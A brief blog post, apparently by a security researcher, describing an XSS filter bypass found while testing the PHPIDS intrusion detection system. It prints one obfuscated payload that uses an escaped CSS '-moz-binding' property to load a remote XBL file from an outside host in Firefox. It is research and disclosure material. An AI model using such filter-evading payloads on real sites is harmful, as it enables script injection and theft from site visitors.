Published 18 years 6 months ago • Last updated March 22, 2025 • ⏱️ < 1 min read
Hacking the PHPIDS again I found some cool XSS:-
<pre lang="javascript"> <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business \i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> </pre>I've moved it onto two lines for correct display.
Who'd have thought that Firefox would allow all that within the url and CSS properties :D